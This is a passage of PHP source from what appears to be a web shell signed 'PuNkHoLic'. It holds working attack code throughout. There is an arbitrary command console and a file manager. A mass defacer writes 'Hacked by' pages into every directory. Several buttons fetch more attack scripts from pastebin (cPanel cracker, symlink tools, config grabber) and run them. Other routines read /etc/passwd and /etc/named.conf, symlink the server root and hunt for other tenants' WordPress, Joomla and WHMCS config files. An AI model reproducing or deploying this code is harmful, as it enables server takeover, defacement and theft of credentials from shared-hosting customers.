'strlen',\r\n);\r\nif(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\r\n\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\necho \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>\";\r\nforeach(\$stringTools as \$k => \$v)\r\necho \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\r\necho \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>\".htmlspecialchars(@\$_POST['p2']).\"</textarea></form><pre class='ml1' style='\".(empty(\$_POST['p1'])?'display:none;':'').\"margin-top:5px' id='strOutput'>\";\r\nif(!empty(\$_POST['p1'])) {\r\nif(function_exists(\$_POST['p1']))\r\necho htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\r\n}\r\necho\"</pre></div>\";\r\nprintFooter();\r\n}\r\nfunction actionFilesTools() {\r\nif( isset(\$_POST['p1']) )\r\n\$_POST['p1'] = urldecode(\$_POST['p1']);\r\nif(@\$_POST['p2']=='download') {\r\nif(is_file(\$_POST['p1']) && is_readable(\$_POST['p1'])) {\r\nob_start(\"ob_gzhandler\", 4096);\r\nheader(\"Content-Disposition: attachment; filename=\".basename(\$_POST['p1']));\r\nif (function_exists(\"mime_content_type\")) {\r\n\$type = @mime_content_type(\$_POST['p1']);\r\nheader(\"Content-Type: \".\$type);\r\n}\r\n\$fp = @fopen(\$_POST['p1'], \"r\");\r\nif(\$fp) {\r\nwhile(!@feof(\$fp))\r\necho @fread(\$fp, 1024);\r\nfclose(\$fp);\r\n}\r\n} elseif(is_dir(\$_POST['p1']) && is_readable(\$_POST['p1'])) {\r\n}\r\nexit;\r\n}\r\nif( @\$_POST['p2'] == 'mkfile' ) {\r\nif(!file_exists(\$_POST['p1'])) {\r\n\$fp = @fopen(\$_POST['p1'], 'w');\r\nif(\$fp) {\r\n\$_POST['p2'] = \"edit\";\r\nfclose(\$fp);\r\n}\r\n}\r\n}\r\nprintHeader();\r\necho '<h1>File tools</h1><div class=content>';\r\nif( !file_exists(@\$_POST['p1']) ) {\r\necho 'File not exists';\r\nprintFooter();\r\nreturn;\r\n}\r\n\$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n\$gid = @posix_getgrgid(@fileowner(\$_POST['p1']));\r\necho '<span>Name:</span> '.htmlspecialchars(\$_POST['p1']).' <span>Size:</span> '.(is_file(\$_POST['p1'])?viewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\necho '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\nif( empty(\$_POST['p2']) )\r\n\$_POST['p2'] = 'view';\r\nif( is_file(\$_POST['p1']) )\r\n\$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\r\nelse\r\n\$m = array('Chmod', 'Rename', 'Touch');\r\nforeach(\$m as \$v)\r\necho '<a href=# onclick=\"g(null,null,null,\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\necho '<br><br>';\r\nswitch(\$_POST['p2']) {\r\ncase 'view':\r\necho '<pre class=ml1>';\r\n\$fp = @fopen(\$_POST['p1'], 'r');\r\nif(\$fp) {\r\nwhile( !@feof(\$fp) )\r\necho htmlspecialchars(@fread(\$fp, 1024));\r\n@fclose(\$fp);\r\n}\r\necho '</pre>';\r\nbreak;\r\ncase 'highlight':\r\nif( is_readable(\$_POST['p1']) ) {\r\necho '<div class=ml1 style=\"background-color: black;color:black;\">';\r\n\$code = highlight_file(\$_POST['p1'],true);\r\necho str_replace(array('<span ','</span>'), array('<font ','</font>'),\$code).'</div>';\r\n}\r\nbreak;\r\ncase 'chmod':\r\nif( !empty(\$_POST['p3']) ) {\r\n\$perms = 0;\r\nfor(\$i=strlen(\$_POST['p3'])-1;\$i>=0;--\$i)\r\n\$perms += (int)\$_POST['p3'][\$i]*pow(8, (strlen(\$_POST['p3'])-\$i-1));\r\nif(!@chmod(\$_POST['p1'], \$perms))\r\necho 'Can\\'t set permissions!<br><script>document.mf.p3.value=\"\";</script>';\r\nelse\r\ndie('<script>g(null,null,null,null,\"\")</script>');\r\n}\r\necho '<form onsubmit=\"g(null,null,null,null,this.chmod.value);return false;\"><input type=text name=chmod value=\"'.substr(sprintf('%o', fileperms(\$_POST['p1'])),-4).'\"><input type=submit value=\">>\"></form>';\r\nbreak;\r\ncase 'edit':\r\nif( !is_writable(\$_POST['p1'])) {\r\necho 'File isn\\'t writeable';\r\nbreak;\r\n}\r\nif( !empty(\$_POST['p3']) ) {\r\n@file_put_contents(\$_POST['p1'],\$_POST['p3']);\r\necho 'Saved!<br><script>document.mf.p3.value=\"\";</script>';\r\n}\r\necho '<form onsubmit=\"g(null,null,null,null,this.text.value);return false;\"><textarea name=text class=bigarea>';\r\n\$fp = @fopen(\$_POST['p1'], 'r');\r\nif(\$fp) {\r\nwhile( !@feof(\$fp) )\r\necho htmlspecialchars(@fread(\$fp, 1024));\r\n@fclose(\$fp);\r\n}\r\necho '</textarea><input type=submit value=\">>\"></form>';\r\nbreak;\r\ncase 'hexdump':\r\n\$c = @file_get_contents(\$_POST['p1']);\r\n\$n = 0;\r\n\$h = array('00000000<br>','','');\r\n\$len = strlen(\$c);\r\nfor (\$i=0; \$i<\$len; ++\$i) {\r\n\$h[1] .= sprintf('%02X',ord(\$c[\$i])).' ';\r\nswitch ( ord(\$c[\$i]) ) {\r\ncase 0:\$h[2] .= ' '; break;\r\ncase 9:\$h[2] .= ' '; break;\r\ncase 10: \$h[2] .= ' '; break;\r\ncase 13: \$h[2] .= ' '; break;\r\ndefault: \$h[2] .= \$c[\$i]; break;\r\n}\r\n\$n++;\r\nif (\$n == 32) {\r\n\$n = 0;\r\nif (\$i+1 < \$len) {\$h[0] .= sprintf('%08X',\$i+1).'<br>';}\r\n\$h[1] .= '<br>';\r\n\$h[2] .= \"\\n\";\r\n}\r\n }\r\necho '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style=\"font-weight: normal;\"><pre>'.\$h[0].'</pre></span></td><td bgcolor=#red><pre>'.\$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars(\$h[2]).'</pre></td></tr></table>';\r\nbreak;\r\ncase 'rename':\r\nif( !empty(\$_POST['p3']) ) {\r\nif(!@rename(\$_POST['p1'], \$_POST['p3']))\r\necho 'Can\\'t rename!<br><script>document.mf.p3.value=\"\";</script>';\r\nelse\r\ndie('<script>g(null,null,\"'.urlencode(\$_POST['p3']).'\",null,\"\")</script>');\r\n}\r\necho '<form onsubmit=\"g(null,null,null,null,this.name.value);return false;\"><input type=text name=name value=\"'.htmlspecialchars(\$_POST['p1']).'\"><input type=submit value=\">>\"></form>';\r\nbreak;\r\ncase 'touch':\r\nif( !empty(\$_POST['p3']) ) {\r\n\$time = strtotime(\$_POST['p3']);\r\nif(\$time) {\r\nif(@touch(\$_POST['p1'],\$time,\$time))\r\ndie('<script>g(null,null,null,null,\"\")</script>');\r\nelse {\r\necho 'Fail!<script>document.mf.p3.value=\"\";</script>';\r\n}\r\n} else echo 'Bad time format!<script>document.mf.p3.value=\"\";</script>';\r\n}\r\necho '<form onsubmit=\"g(null,null,null,null,this.touch.value);return false;\"><input type=text name=touch value=\"'.date(\"Y-m-d H:i:s\", @filemtime(\$_POST['p1'])).'\"><input type=submit value=\">>\"></form>';\r\nbreak;\r\ncase 'mkfile':\r\nbreak;\r\n}\r\necho '</div>';\r\nprintFooter();\r\n}\r\nfunction actionDefacer() {\r\nprintHeader();\r\necho \"<h1>Recursive Mass Defacer</h1><div class=content>\";\r\n?>\r\n<form ENCTYPE=\"multipart/form-data\" action=\"<?\$_SERVER['PHP_SELF']?>\" method=POST onSubmit=\"g(null,null,this.path.value,this.file.value,this.Contents.value);return false;\">\r\n<p align=\"Left\">Folder: <input type=text name=path size=60 value=\"<?=getcwd(); ?>\">\r\n<br>file name : <input type=text name=file size=20 value=\"index.htm\">\r\n<br>Text Content : <input type=text name=Contents size=20 value=\"Hacked by PuNkHoLic \"> \r\n<br><input type=submit value=\"Update\"></p></form>\r\n<?php\r\nif (\$_POST['a'] == 'Defacer') {\r\n\$mainpath = \$_POST[p1];\r\n\$file = \$_POST[p2];\r\n\$txtContents = \$_POST[p3];\r\necho \"-----------------------------------------------<br>\r\n[+] Recursive Mass defacer<br>\r\n-----------------------------------------------<br><br> \";\r\n\$dir = opendir(\$mainpath);\r\nwhile (\$row = readdir(\$dir)) {\r\n\$start = @fopen(\"\$row/\$file\", \"w+\");\r\n\$code = \$txtContents;\r\n\$finish = @fwrite(\$start, \$code);\r\nif (\$finish) {\r\necho \"http://\$row/\$file<br>\";\r\n}\r\nif (strncasecmp(PHP_OS, 'WIN', 3) == 0) {\r\nexec(\"for /r %cd% %i in (.) do @copy \$file %i 1>NUL\");\r\n} else {\r\nsystem(\"find \$PWM -type d -exec cp \$file {} \\;\");\r\n}\r\n}\r\necho \"-----------------------------------------------<br><br>[+] Script by PuNkHoLic          [+]\";\r\n}\r\necho '</div>';\r\nprintFooter();\r\n}\r\nfunction actionConsole() {\r\nif(isset(\$_POST['ajax'])) {\r\n\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\nob_start();\r\necho \"document.cf.cmd.value='';\\n\";\r\n\$temp = @iconv(\$_POST['charset'], 'UTF-8', addcslashes(\"\\n\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']),\"\\n\\r\\t\\\\'\\0\"));\r\nif(preg_match(\"!.*cd\\s+([^;]+)\$!\",\$_POST['p1'],\$match)){\r\nif(@chdir(\$match[1])) {\r\n\$GLOBALS['cwd'] = @getcwd();\r\necho \"document.mf.c.value='\".\$GLOBALS['cwd'].\"';\";\r\n}\r\n}\r\necho \"document.cf.output.value+='\".\$temp.\"';\";\r\necho \"document.cf.output.scrollTop = document.cf.output.scrollHeight;\";\r\n\$temp = ob_get_clean();\r\necho strlen(\$temp), \"\\n\", \$temp;\r\nexit;\r\n}\r\nprintHeader();\r\necho '<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\"\");\r\nvar cur = 0;\r\nfunction kp(e) {\r\nvar n = (window.Event) ? e.which : e.keyCode;\r\nif(n == 38) {\r\ncur--;\r\nif(cur>=0)\r\ndocument.cf.cmd.value = cmds[cur];\r\nelse\r\ncur++;\r\n} else if(n == 40) {\r\ncur++;\r\nif(cur < cmds.length)\r\ndocument.cf.cmd.value = cmds[cur];\r\nelse\r\ncur--;\r\n}\r\n}\r\nfunction add(cmd) {\r\ncmds.pop();\r\ncmds.push(cmd);\r\ncmds.push(\"\");\r\ncur = cmds.length-1;\r\n}\r\n</script>';\r\necho '<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value==\\'clear\\'){document.cf.output.value=\\'\\';document.cf.cmd.value=\\'\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;\"><select name=alias>';\r\nforeach(\$GLOBALS['aliases'] as \$n => \$v) {\r\nif(\$v == '') {\r\necho '<optgroup label=\"-'.htmlspecialchars(\$n).'-\"></optgroup>';\r\ncontinue;\r\n}\r\necho '<option value=\"'.htmlspecialchars(\$v).'\">'.\$n.'</option>';\r\n}\r\nif(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\r\n\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\necho '</select><input type=button onclick=\"add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}\" value=\">>\"> <input type=checkbox name=ajax value=1 '.(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style=\"border-bottom:0;\" readonly>';\r\nif(!empty(\$_POST['p1'])) {\r\necho htmlspecialchars(\"\$ \".\$_POST['p1'].\"\\n\".ex(\$_POST['p1']));\r\n}\r\necho '</textarea><input type=text name=cmd style=\"border-top:1;width:100%;\" onkeydown=\"kp(event);\">';\r\necho '</form></div><script>document.cf.cmd.focus();</script>';\r\nprintFooter();\r\n}\r\nfunction actionLogout() {\r\nunset(\$_SESSION[md5(\$_SERVER['HTTP_HOST'])]);\r\necho '<title>Get out Now</title><body bgcolor=#000000><center><img src=\"http://i.imgur.com/t54UCIw.jpgl\"><br>\r\n<style type=\"text/css\">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href=\"http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html\" target=\"_blank\" title=\"Chrome Pointer\"><img src=\"http://cur.cursors-4u.net/cursor.png\" border=\"0\" alt=\"Chrome Pointer\" style=\"position:absolute; top: 0px; right: 0px;\" /></a>\r\n<span style=\"color:red;font: 20pt audiowide;\">You are out now :D<br>www.facebook.com/PuNkHoLic</h2></span></center></body>';\r\n}\r\n///my editing start here for tools\r\nfunction download_remote_file(\$file_url, \$save_to)\r\n{\r\n\$content = file_get_contents(\$file_url);\r\nfile_put_contents(\$save_to, \$content);\r\n}\r\nif (isset(\$_POST['cp'])) {\r\ndownload_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath(\"./\") . '/cp.php');\r\nheader(\"location:cp.php\");\r\n} \r\nif (isset(\$_POST['SymlinkbySmevk'])) {\r\ndownload_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath(\"./\") . '/SymlinkbySmevk.php');\r\nheader(\"location:SymlinkbySmevk.php\");\r\n}\r\nif (isset(\$_POST['SymlinkbyCheetah'])) {\r\ndownload_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath(\"./\") . '/SymlinkbyCheetah.php');\r\nheader(\"location:SymlinkbyCheetah.php\");\r\n}\r\nif (isset(\$_POST['SymlinkbyTorjan'])) {\r\ndownload_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath(\"./\") . '/sym.py');\r\n\$url = 'http://' . \$_SERVER['SERVER_NAME'] . dirname(\$_SERVER['SCRIPT_NAME']) . '/trjnx/';\r\nheader('location: '.\$url);\r\nsystem('python sym.py');\r\n}\r\nif (isset(\$_POST['jump'])) {\r\ndownload_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath(\"./\") . '/jump.php');\r\nheader(\"location:jump.php\");\r\n}\r\nif (isset(\$_POST['adminer'])) {\r\nsystem('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php');\r\nheader(\"location:adminer-4.2.5-mysql-en.php\");\r\n}\r\nif (isset(\$_POST['cg'])) {\r\ndownload_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath(\"./\") . '/cg.php');\r\nheader(\"location:cg.php\");\r\n}\r\nfunction actionImportScripts() {\r\nprintHeader();\r\necho '<table border=\"1px\" align=\"center\" id =\"PuNkHoLictools\" cellpadding=\"10\" border-color\"green\"><tr><td>Just click and get the Script :).</td><tr><td>\r\n<form action =\"\" method=\"post\">\r\n<input type = \"submit\" name=\"cp\" value =\"Cpanel Cracker\"></td></tr>';\r\necho '<tr><td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"SymlinkbyTorjan\"value =\"Symlink Python Script By Torjan\"></a></td></tr>';\r\necho '<td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"SymlinkbySmevk\" value =\"Symlink Script By SmEvK_PaThAn\"></a></td></tr>';\r\necho '<tr><td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"SymlinkbyCheetah\" value =\"Symlink By Kashmiri Cheetah\"></a></td></tr>';\r\necho '<tr><td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"jump\" value =\"Jumping Shell\"></a></td></tr>';\r\necho '<tr><td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"adminer\"value =\"Adminer\"></a></td></tr>';\r\necho '<tr><td><form action =\"\" method=\"post\"><input type = \"submit\" name=\"cg\"value =\"Config Grabber\"></a></td></tr>';\r\nprintFooter();\r\n}\r\nfunction actionShared() {\r\nprintHeader();\r\n\$file = @implode(@file(\"/etc/named.conf\"));\r\nif (!\$file) {\r\ndie(\"# can't ReaD -> [ /etc/named.conf ]\");\r\n}\r\npreg_match_all(\"#named/(.*?).db#\", \$file, \$r);\r\n\$domains = array_unique(\$r[1]);\r\n{\r\nforeach (\$domains as \$domain) {\r\n\$user = posix_getpwuid(@fileowner(\"/etc/valiases/\" . \$domain));\r\n\$array= \"http://\$domain \" . \$user['name'] . \"<br>\";\r\n\$lol= '' . get_current_user();\r\nif (strpos(\$array, \"\$lol\") !== false) {\r\n\$shared = str_replace(array(\" \$lol\"), \"\", \$array);\r\necho \"<center>\$shared\";\r\n}\r\n}\r\n}\r\nprintFooter();\r\n}\r\nfunction actionSymlink() {\r\nprintHeader();\r\necho '<h1>Symlink</h1>';\r\n\$furl = 'http://'.\$_SERVER['SERVER_NAME'].\$_SERVER['REQUEST_URI'];\r\n\$expld = explode('/',\$furl );\r\n\$burl =str_replace(end(\$expld),'',\$furl);\r\necho '<div class=\"content\"><center>\r\n<h3>[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'website\\',null)\">Domains</a> ] - \r\n[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'whole\\',null)\">Whole Server Symlink<sup style=\"color:red;text-decoration:blink;\"></sup></a> ] - \r\n[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'config\\',null)\">Config files symlink</a> ]</h3></center>';\r\nif(isset(\$_POST['p1']) && \$_POST['p1']=='website')\r\n{\r\necho \"<center>\";\r\n\$d0mains = @file(\"/etc/named.conf\");\r\nif(!\$d0mains){ \r\necho \"<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>\"; \r\n} else {\r\necho \"<table align=center class='main' border=0 ><tr><th> Domains </th></tr>\";\r\n\$unk = array();\r\nforeach(\$d0mains as \$d0main){\r\nif(@eregi(\"zone\",\$d0main)){\r\npreg_match_all('#zone \"(.*)\"#', \$d0main, \$domains);\r\nflush();\r\nif(strlen(trim(\$domains[1][0])) > 2){\r\n\$unk[] = \$domains[1][0];\r\nflush();\r\n}\r\n}\r\n}\r\n\$count=1;\r\n\$unk = array_unique(\$unk);\r\n\$l=0;\r\nforeach(\$unk as \$d){\r\n\$user = posix_getpwuid(@fileowner(\"/etc/valiases/\".\$d));\r\necho \"<tr\".(\$l?' class=l1':'').\"><td><a href=http://\".\$d.\"/>\".\$d.\"</a></td><td>\".\$user['name'].\"</td></tr>\";\r\nflush();\r\n\$count++;\r\n\$l=\$l?0:1;\r\n}\r\necho \"</table>\";\r\n}\r\necho \"</center>\"; \r\n}\r\nif(isset(\$_POST['p1']) && \$_POST['p1']=='whole')\r\n{\r\necho \"<center>\";\r\n@mkdir('PCAPuNkHoLic_sym',0777);\r\n\$hdt= \"Options all\\nDirectoryIndex Sux.html\\nAddType text/plain .php\\nAddHandler server-parsed .php\\nAddType text/plain .html\\nAddHandler txt .html\\nRequire None\\nSatisfy Any\";\r\n\$hfp =@fopen ('PCAPuNkHoLic_sym/.htaccess','w');\r\nfwrite(\$hfp ,\$hdt);\r\nif(function_exists('symlink')) {\r\n@symlink('/','PCAPuNkHoLic_sym/root');\r\n}\r\n\$d0mains = @file('/etc/named.conf');\r\nif(!\$d0mains) {\r\necho \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\necho \"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>\";\r\n\$dt = file('/etc/passwd');\r\n\$l=0;\r\nforeach(\$dt as \$d) {\r\n\$r = explode(':',\$d);\r\nif(strpos(\$r[5],'home')) {\r\necho \"<tr\".(\$l?' class=l1':'').\"><td>\".\$j.\"</td><td>---</td><td>\".\$r[0].\"</td><td><a href='PCAPuNkHoLic_sym/root\".\$r[5].\"/public_html' target='_blank'>symlink</a></td></tr>\";\r\n\$l=\$l?0:1;\r\n\$j++;\r\n}\r\n}\r\necho '</table>';\r\n} else {\r\necho \"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>\";\r\n\$count=1;\r\n\$mck = array();\r\nforeach(\$d0mains as \$d0main){\r\nif(@eregi('zone',\$d0main)){\r\npreg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\nflush();\r\nif(strlen(trim(\$domain[1][0])) >2){\r\n\$mck[] = \$domain[1][0];\r\n}\r\n}\r\n}\r\n\$mck = array_unique(\$mck);\r\n\$usr = array();\r\n\$dmn = array();\r\nforeach(\$mck as \$o) {\r\n\$infos = @posix_getpwuid(fileowner(\"/etc/valiases/\".\$o));\r\n\$usr[] = \$infos['name'];\r\n\$dmn[] = \$o;\r\n}\r\narray_multisort(\$usr,\$dmn);\r\n\$dt = file('/etc/passwd');\r\n\$passwd = array();\r\nforeach(\$dt as \$d) {\r\n\$r = explode(':',\$d);\r\nif(strpos(\$r[5],'home')) {\r\n\$passwd[\$r[0]] = \$r[5];\r\n}\r\n}\r\n\$l=0;\r\n\$j=1;\r\nforeach(\$usr as \$r) {\r\necho \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count++.\"</td>\r\n<td><a target='_blank' href=http://\".\$dmn[\$j-1].'/>'.\$dmn[\$j-1].' </a></td>\r\n<td>'.\$r.\"</td>\r\n<td><a href='PCAPuNkHoLic_sym/root\".\$passwd[\$r].\"/public_html' target='_blank'>symlink</a></td></tr>\";\r\nflush();\r\n\$l=\$l?0:1;\r\n\$j++;\r\n}\r\necho '</table>';\r\n}\r\necho \"</center>\";\r\n}\r\nif(isset(\$_POST['p1']) && \$_POST['p1']=='config')\r\n{\r\necho \"<center>\";\r\n@mkdir('PCAPuNkHoLic_sym',0777);\r\n\$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\nAddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n\$hfp = @fopen ('PCAPuNkHoLic_sym/.htaccess','w');\r\n@fwrite(\$hfp ,\$hdt);\r\nif(function_exists('symlink')) {\r\n@symlink('/','PCAPuNkHoLic_sym/root');\r\n}\r\n\$d0mains=@file('/etc/named.conf');\r\nif(!\$d0mains) {\r\necho \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n}else {\r\necho \"<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>\";\r\n\$count = 1;\r\n\$l=0;\r\nforeach(\$d0mains as \$d0main){\r\nif(@eregi('zone',\$d0main)){\r\npreg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\nflush();\r\nif(strlen(trim(\$domain[1][0]))>2){\r\n\$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$domain[1][0]));\r\n\$c1 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/wp-config.php';\r\n\$ch01 = get_headers(\$c1);\r\n\$cf01 = \$ch01[0];\r\n\$c2 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/blog/wp-config.php';\r\n\$ch02 = get_headers(\$c2);\r\n\$cf02 = \$ch02[0];\r\n\$c3 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/configuration.php';\r\n\$ch03 = get_headers(\$c3);\r\n\$cf03 = \$ch03[0];\r\n\$c4 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/joomla/configuration.php';\r\n\$ch04 = get_headers(\$c4);\r\n\$cf04 = \$ch04[0];\r\n\$c5 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/includes/config.php';\r\n\$ch05 = get_headers(\$c5);\r\n\$cf05 = \$ch05[0];\r\n\$c6 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/vb/includes/config.php';\r\n\$ch06 = get_headers(\$c6);\r\n\$cf06 = \$ch06[0];\r\n\$c7 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/forum/includes/config.php';\r\n\$ch07 = get_headers(\$c7);\r\n\$cf07 = \$ch07[0];\r\n\$c8 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'public_html/clients/configuration.php';\r\n\$ch08 = get_headers(\$c8);\r\n\$cf08 = \$ch08[0];\r\n\$c9 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/support/configuration.php';\r\n\$ch09 = get_headers(\$c9);\r\n\$cf09 = \$ch09[0];\r\n\$c10 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n\$ch10 = get_headers(\$c10);\r\n\$cf10 = \$ch10[0];\r\n\$c11 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/submitticket.php';\r\n\$ch11 = get_headers(\$c11);\r\n\$cf11 = \$ch11[0];\r\n\$c12 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n\$ch12 = get_headers(\$c12);\r\n\$cf12 = \$ch12[0];\r\n\$c13 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/includes/configure.php';\r\n\$ch13 = get_headers(\$c13);\r\n\$cf13 = \$ch13[0];\r\n\$c14 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/include/app_config.php';\r\n\$ch14 = get_headers(\$c14);\r\n\$cf14 = \$ch14[0];\r\n\$c15 = \$burl.'/PCAPuNkHoLic_sym/root/home/'.\$user['name'].'/public_html/sites/default/settings.php';\r\n\$ch15 = get_headers(\$c15);\r\n\$cf15 = \$ch15[0];\r\n\$out = '&nbsp;';\r\nif(strpos(\$cf01,'200') == true){ \$out = \"<a href='\".\$c1.\"' target='_blank'>Wordpress</a>\"; } \r\nelseif(strpos(\$cf02,'200') == true){ \$out = \"<a href='\".\$c2.\"' target='_blank'>Wordpress</a>\"; }\r\nelseif(strpos(\$cf03,'200') == true && strpos(\$cf11,'200') == true) { \$out = \" <a href='\".\$c11.\"' target='_blank'>WHMCS</a>\"; }\r\nelseif(strpos(\$cf09,'200') == true){ \$out = \" <a href='\".\$c9.\"' target='_blank'>WHMCS</a>\";}\r\nelseif(strpos(\$cf10,'200') == true){ \$out = \" <a href='\".\$c10.\"' target='_blank'>WHMCS</a>\"; }\r\nelseif(strpos(\$cf03,'200') == true){ \$out = \" <a href='\".\$c3.\"' target='_blank'>Joomla</a>\"; }\r\nelseif(strpos(\$cf04,'200') == true){ \$out = \" <a href='\".\$c4.\"' target='_blank'>Joomla</a>\"; }\r\nelseif(strpos(\$cf05,'200') == true){ \$out = \" <a href='\".\$c5.\"' target='_blank'>vBulletin</a>\";}\r\nelseif(strpos(\$cf06,'200') == true){ \$out = \" <a href='\".\$c6.\"' target='_blank'>vBulletin</a>\";}\r\nelseif(strpos(\$cf07,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>vBulletin</a>\";}\r\nelseif(strpos(\$cf08,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";}\r\nelseif(strpos(\$cf12,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";}\r\nelseif(strpos(\$cf13,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>osCommerce/Zen Cart</a>\";}\r\nelseif(strpos(\$cf14,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>Magento</a>\";}\r\nelseif(strpos(\$cf15,'200') == true){ \$out = \" <a href='\".\$c7.\"' target='_blank'>Drupal</a>\";}\r\nelse {\r\ncontinue;\r\n}\r\necho '<tr'.(\$l?' class=l1':'').'><td>'.\$count++.'</td><td><a href=http://www.'.\$domain[1][0].'/>'.\$domain[1][0].'</a></td><td>'.\$user['name'].'</td><td>'.\$out.'</td></tr>';\r\nflush();\r\n\$l=\$l?0:1;\r\n}\r\n}\r\n}\r\necho \"</table>\";\r\n}\r\necho \"</center>\"; \r\n}\r\necho \"</div>\";\r\nprintFooter();\r\n} \r\n function actionJumping() \r\n{printHeader();\r\necho '<html><head><title>'.getenv(\"HTTP_HOST\").' - Jumping Server</title></head><body>';\r\n(\$sm = ini_get('safe_mode') == 0) ? \$sm = 'off': die('<font size=\"4\" color=\"#000000\" face=\"Calibri\"><b>Error: Safe_mode = On</b></font>');\r\nset_time_limit(0);@\$passwd = fopen('/etc/passwd','r');if (!\$passwd) { die('<font size=\"4\" color=\"#000000\" face=\"Calibri\"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }\r\n\$pub = array();\$users = array();\$conf = array();\$i = 0;while(!feof(\$passwd)){\$str = fgets(\$passwd);if (\$i > 100){ \$pos = strpos(\$str,':');\$username = substr(\$str,0,\$pos);\$dirz = '/home/'.\$username.'/public_html/';if ((\$username != '')) 